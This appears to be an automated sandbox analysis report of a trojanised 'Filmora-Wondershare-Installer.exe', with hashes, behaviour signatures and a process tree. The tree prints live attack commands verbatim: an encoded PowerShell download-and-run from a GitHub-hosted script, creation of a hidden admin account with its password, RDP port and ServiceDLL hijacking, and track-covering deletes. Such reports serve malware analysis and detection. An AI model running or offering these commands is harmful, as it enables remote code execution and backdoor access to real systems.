Analysis
max time kernel: 128s
max time network: 136s
platform: windows10_x64
resource: win10v20210410
submitted: 21-07-2021 08:36
Static task: static1
Behavioral task: behavioral1
  Sample: Filmora-Wondershare-Installer.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: Filmora-Wondershare-Installer.exe
  Resource: win10v20210410
General
Target: Filmora-Wondershare-Installer.exe
Size: 9.2MB
MD5: 5e12e56a643c71b913ea60f48f28726d
SHA1: 8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
SHA256: 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
SHA512: 807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
pid 4292 powershell.exe: network flows 18, 20, 21, 22, 24, 26, 28, 30, 32
Executes dropped EXE 4 IoCs
Processes:
pid 2488 ViJoy.exe
pid 3268 exe2.exe
pid 3304 exe1.exe
pid 1684 NFWCHK.exe
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Resource / yara_rule:
\Windows\Branding\mediasrv.png: upx
\Windows\Branding\mediasvc.png: upx
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Filmora-Wondershare-Installer.exe: key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation
Deletes itself 1 IoCs
Processes:
pid 1816 powershell.exe
Loads dropped DLL 2 IoCs
Processes:
pid 4692
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
exe2.exe: file opened for modification \??\PhysicalDrive0
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exe: file opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
powershell.exe: file opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
powershell.exe: file opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
powershell.exe: file opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
Drops file in Windows directory 19 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 1 IoCs
Processes:
Filmora-Wondershare-Installer.exe: key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
HTTP User-Agent header (flows 20, 21, 22, 24): Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 18 IoCs
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid 620
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid 3268 exe2.exe (listed twice)
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
  cmd: "C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
[depth 4] C:\Users\Public\Documents\Wondershare\NFWCHK.exe
  cmd: C:\Users\Public\Documents\Wondershare\NFWCHK.exe
- Executes dropped EXE
-
[depth 3] C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
  cmd: "C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmd: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.cmdline"
- Suspicious use of WriteProcessMemory
-
[depth 6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES385B.tmp" "c:\Users\Admin\AppData\Local\Temp\ca1csawe\CSCCA8CC198C1144714B612E13F5E396C81.TMP"
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 5] C:\Windows\system32\reg.exe
  cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
-
[depth 5] C:\Windows\system32\reg.exe
  cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
- Modifies registry key
-
[depth 5] C:\Windows\system32\reg.exe
  cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
-
[depth 5] C:\Windows\system32\net.exe
  cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- Suspicious use of WriteProcessMemory
-
[depth 6] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
-
[depth 5] C:\Windows\system32\cmd.exe
  cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
-
[depth 6] C:\Windows\system32\cmd.exe
  cmd: cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
-
[depth 7] C:\Windows\system32\net.exe
  cmd: net start rdpdr
- Suspicious use of WriteProcessMemory
-
[depth 8] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 start rdpdr
-
[depth 5] C:\Windows\system32\cmd.exe
  cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
- Suspicious use of WriteProcessMemory
-
[depth 6] C:\Windows\system32\cmd.exe
  cmd: cmd /c net start TermService
- Suspicious use of WriteProcessMemory
-
[depth 7] C:\Windows\system32\net.exe
  cmd: net start TermService
- Suspicious use of WriteProcessMemory
-
[depth 8] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 start TermService
-
[depth 5] C:\Windows\system32\cmd.exe
  cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
-
[depth 5] C:\Windows\system32\cmd.exe
  cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user WgaUtilAcc 000000 /del
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\system32\net.exe
  cmd: net.exe user WgaUtilAcc 000000 /del
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user WgaUtilAcc 9aDQknBl /add
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\system32\net.exe
  cmd: net.exe user WgaUtilAcc 9aDQknBl /add
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 user WgaUtilAcc 9aDQknBl /add
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\system32\net.exe
  cmd: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\system32\net.exe
  cmd: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
[depth 2] C:\Windows\system32\net.exe
  cmd: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
[depth 3] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user WgaUtilAcc 9aDQknBl
-
[depth 2] C:\Windows\system32\net.exe
  cmd: net.exe user WgaUtilAcc 9aDQknBl
-
[depth 3] C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 user WgaUtilAcc 9aDQknBl
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C wmic path win32_VideoController get name
-
[depth 2] C:\Windows\System32\Wbem\WMIC.exe
  cmd: wmic path win32_VideoController get name
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C wmic CPU get NAME
-
[depth 2] C:\Windows\System32\Wbem\WMIC.exe
  cmd: wmic CPU get NAME
- Modifies data under HKEY_USERS
-
[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
-
[depth 2] C:\Windows\system32\cmd.exe
  cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES385B.tmpMD5
ac3224d41bce4537262e7f8ba8d78f58
SHA1e5113a1986082373e7ed1f456bc7b16165f5e5f2
SHA2560381df5785f837ae79f0d6ef628ff48d2dbd4df2773656c4cd612dca8dfdffbb
SHA5121922af989c089fbc3c68f49ba7b02a36457ee792d3a44a44dbf4235895ddbbba10c0d7eeb5b3ae8ec556e63e88edbac8228eaa6dedb4c3d66c9b440faa640120
-
C:\Users\Admin\AppData\Local\Temp\Setup.zipMD5
36f178576dcb8db35d6f06448b1eb510
SHA162277c90cc2b1bb81b36571037afe5081b0605d5
SHA256192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA5129e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.dll
MD5 726e1b64e82e6db7580e571d65e9ca11
SHA1 0da75ac717cf19f56fefd0c652476733eb029ea5
SHA256 7dc1a57e90035e81a464fd2dccb80690706d2dcc34d6b9e90df3492ca84f733e
SHA512 fa5cdc52873fd5185f6e0fb33d74abc947ac8bede7fdc20e7a157ea1e5209ef902e5c346109ef228112fc7a891f143004ad7cc280c2eb6bd0149accd1d4e3a56
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
MD5 43473f4e719958639a9d89e5d8388999
SHA1 ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256 ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
MD5 eaee663dfeb2efcd9ec669f5622858e2
SHA1 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
MD5 c9622e294a0f3c6c4dfcf716cd2e6692
SHA1 829498d010f331248be9fd512deb44d1eceac344
SHA256 f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512 d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
MD5 27cfb3990872caa5930fa69d57aefe7b
SHA1 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA256 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512 a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
MD5 ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1 ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA256 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA512 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b
-
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\CSCCA8CC198C1144714B612E13F5E396C81.TMP
MD5 a51da7f1861b4b8bd423bd545f0c0265
SHA1 0a864e1720dfc97f0e4bb53e661ba10c6ff15242
SHA256 a36fcfe211505cc87c0a322d0abfee0dd75a9ffb1de6fbbec107c8b7514694ec
SHA512 4621e7d87671d7d731672c775473c06d77fb14df08b1999423f0e7aa7ae38d8c17cbe8c97b30fa668fc999c202d89e67aca5726bab7d000dc44c8276c20f5298
-
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.0.cs
MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.cmdline
MD5 4e052ea9ba7a45545631bdb647d0cece
SHA1 18737bc8a2515039b73a4b2f11ad1b724c889fac
SHA256 7670437a5030cf05789e447da5c1bac276c7b1c108f8d35170a5f6239a79fbad
SHA512 e35545b7c5364f04f823a24acde8a2a6dbbbbc30b421a28ea839ab09ad2d26477814b5f50971d1426e31024af24b9da9ea80cdcb5ab627630ba910e7de66d19b
-
\Windows\Branding\mediasrv.png
MD5 271eacd9c9ec8531912e043bc9c58a31
SHA1 c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
\Windows\Branding\mediasvc.png
MD5 1fa9c1e185a51b6ed443dd782b880b0d
SHA1 50145abf336a196183882ef960d285bd77dd3490
SHA256 f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
- memory/680-114-0x0000000000490000-0x0000000000491000-memory.dmp (Filesize 4KB)
- memory/680-116-0x0000000002A10000-0x0000000002A12000-memory.dmp (Filesize 8KB)
- memory/1536-401-0x0000000000000000-mapping.dmp
- memory/1684-136-0x0000000000000000-mapping.dmp
- memory/1684-140-0x0000000003030000-0x0000000003032000-memory.dmp (Filesize 8KB)
- memory/1776-165-0x0000000000000000-mapping.dmp
- memory/1784-281-0x0000000000000000-mapping.dmp
- memory/1784-317-0x0000015FFD9D0000-0x0000015FFD9D2000-memory.dmp (Filesize 8KB)
- memory/1784-318-0x0000015FFD9D3000-0x0000015FFD9D5000-memory.dmp (Filesize 8KB)
- memory/1784-319-0x0000015FFD9D6000-0x0000015FFD9D8000-memory.dmp (Filesize 8KB)
- memory/1784-328-0x0000015FFD9D8000-0x0000015FFD9DA000-memory.dmp (Filesize 8KB)
- memory/1816-141-0x0000000000000000-mapping.dmp
- memory/1816-177-0x000002A92EB80000-0x000002A92EB81000-memory.dmp (Filesize 4KB)
- memory/1816-159-0x000002A915320000-0x000002A915322000-memory.dmp (Filesize 8KB)
- memory/1816-161-0x000002A915323000-0x000002A915325000-memory.dmp (Filesize 8KB)
- memory/1816-162-0x000002A915326000-0x000002A915328000-memory.dmp (Filesize 8KB)
- memory/1816-152-0x000002A92E290000-0x000002A92E291000-memory.dmp (Filesize 4KB)
- memory/1816-147-0x000002A92E0E0000-0x000002A92E0E1000-memory.dmp (Filesize 4KB)
- memory/1816-191-0x000002A915328000-0x000002A915329000-memory.dmp (Filesize 4KB)
- memory/1816-169-0x000002A92E240000-0x000002A92E241000-memory.dmp (Filesize 4KB)
- memory/1816-176-0x000002A92E7F0000-0x000002A92E7F1000-memory.dmp (Filesize 4KB)
- memory/1988-277-0x0000018CF2586000-0x0000018CF2588000-memory.dmp (Filesize 8KB)
- memory/1988-233-0x0000000000000000-mapping.dmp
- memory/1988-274-0x0000018CF2580000-0x0000018CF2582000-memory.dmp (Filesize 8KB)
- memory/1988-275-0x0000018CF2583000-0x0000018CF2585000-memory.dmp (Filesize 8KB)
- memory/1988-279-0x0000018CF2588000-0x0000018CF258A000-memory.dmp (Filesize 8KB)
- memory/2008-402-0x0000000000000000-mapping.dmp
- memory/2252-404-0x0000000000000000-mapping.dmp
- memory/2488-122-0x0000000003010000-0x0000000003011000-memory.dmp (Filesize 4KB)
- memory/2488-123-0x0000000005800000-0x0000000005831000-memory.dmp (Filesize 196KB)
- memory/2488-117-0x0000000000000000-mapping.dmp
- memory/2488-120-0x00000000008E0000-0x00000000008E1000-memory.dmp (Filesize 4KB)
- memory/3268-125-0x0000000000000000-mapping.dmp
- memory/3304-132-0x0000017AF5913000-0x0000017AF5915000-memory.dmp (Filesize 8KB)
- memory/3304-131-0x0000017AF5910000-0x0000017AF5912000-memory.dmp (Filesize 8KB)
- memory/3304-129-0x0000017AF7BF0000-0x0000017AF7E9A000-memory.dmp (Filesize 2.7MB)
- memory/3304-124-0x0000000000000000-mapping.dmp
- memory/3304-134-0x0000017AF5916000-0x0000017AF5917000-memory.dmp (Filesize 4KB)
- memory/3304-133-0x0000017AF5915000-0x0000017AF5916000-memory.dmp (Filesize 4KB)
- memory/3844-193-0x0000024A39F73000-0x0000024A39F75000-memory.dmp (Filesize 8KB)
- memory/3844-228-0x0000024A39F78000-0x0000024A39F7A000-memory.dmp (Filesize 8KB)
- memory/3844-184-0x0000000000000000-mapping.dmp
- memory/3844-192-0x0000024A39F70000-0x0000024A39F72000-memory.dmp (Filesize 8KB)
- memory/3844-227-0x0000024A39F76000-0x0000024A39F78000-memory.dmp (Filesize 8KB)
- memory/3860-160-0x0000000000000000-mapping.dmp
- memory/4100-400-0x0000000000000000-mapping.dmp
- memory/4180-403-0x0000000000000000-mapping.dmp
- memory/4272-338-0x0000000000000000-mapping.dmp
- memory/4292-339-0x0000000000000000-mapping.dmp
- memory/4292-420-0x000001EBE9250000-0x000001EBE9252000-memory.dmp (Filesize 8KB)
- memory/4292-406-0x0000000000000000-mapping.dmp
- memory/4292-421-0x000001EBE9253000-0x000001EBE9255000-memory.dmp (Filesize 8KB)
- memory/4292-425-0x000001EBE9256000-0x000001EBE9258000-memory.dmp (Filesize 8KB)
- memory/4292-477-0x000001EBE9258000-0x000001EBE9259000-memory.dmp (Filesize 4KB)
- memory/4296-405-0x0000000000000000-mapping.dmp
- memory/4312-340-0x0000000000000000-mapping.dmp
- memory/4496-377-0x0000000000000000-mapping.dmp
- memory/4516-378-0x0000000000000000-mapping.dmp
- memory/4548-381-0x0000000000000000-mapping.dmp
- memory/4564-382-0x0000000000000000-mapping.dmp
- memory/4580-383-0x0000000000000000-mapping.dmp
- memory/4600-384-0x0000000000000000-mapping.dmp
- memory/4620-385-0x0000000000000000-mapping.dmp
- memory/4636-386-0x0000000000000000-mapping.dmp
- memory/4652-387-0x0000000000000000-mapping.dmp
- memory/4672-388-0x0000000000000000-mapping.dmp
- memory/4780-391-0x0000000000000000-mapping.dmp
- memory/4800-392-0x0000000000000000-mapping.dmp
- memory/4860-393-0x0000000000000000-mapping.dmp
- memory/4880-394-0x0000000000000000-mapping.dmp
- memory/4928-492-0x0000000000000000-mapping.dmp
- memory/4940-395-0x0000000000000000-mapping.dmp
- memory/4956-491-0x0000000000000000-mapping.dmp
- memory/4960-396-0x0000000000000000-mapping.dmp
- memory/5020-397-0x0000000000000000-mapping.dmp
- memory/5040-398-0x0000000000000000-mapping.dmp
- memory/5100-399-0x0000000000000000-mapping.dmp